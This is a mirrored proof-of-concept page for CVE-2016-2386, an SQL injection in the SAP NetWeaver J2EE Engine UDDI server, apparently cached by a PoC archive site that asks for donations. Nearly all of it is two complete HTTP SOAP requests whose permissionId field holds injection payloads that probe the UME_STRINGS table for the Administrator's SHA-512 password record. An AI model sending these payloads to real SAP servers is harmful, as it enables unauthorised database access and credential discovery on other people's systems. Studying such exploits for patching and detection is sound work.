Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2016-2386 PoC — SAP NetWeaver J2EE Engine UDDI服务器SQL注入漏洞

Source
https://github.com/murataydemir/CVE-2016-2386
Associated Vulnerability
Title:SAP NetWeaver J2EE Engine UDDI服务器SQL注入漏洞 (CVE-2016-2386)
Description:SAP NetWeaver J2EE Engine是德国思爱普(SAP)公司的一个面向服务的集成化应用平台的J2EE引擎。 SAP NetWeaver J2EE Engine 7.40版本的UDDI服务器中存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意SQL命令。
Description
[CVE-2016-2386] SAP NetWeaver AS JAVA UDDI Component SQL Injection
Readme
<b>[CVE-2016-2386] SAP NetWeaver AS JAVA UDDI Component SQL Injection</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
```
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
    <soapenv:Header />
    <soapenv:Body>
        <sec:deletePermissionById>
            <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
        </sec:deletePermissionById>
    </soapenv:Body>
</soapenv:Envelope>
```

```
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
    <soapenv:Header />
    <soapenv:Body>
        <sec:deletePermissionById>
            <permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or '1'='1</permissionId>
        </sec:deletePermissionById>
    </soapenv:Body>
</soapenv:Envelope>
```
File Snapshot

 [4.0K]  /data/pocs/4bf92177da1f45762d5b610c6fc57533a61e222a
└── [1.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.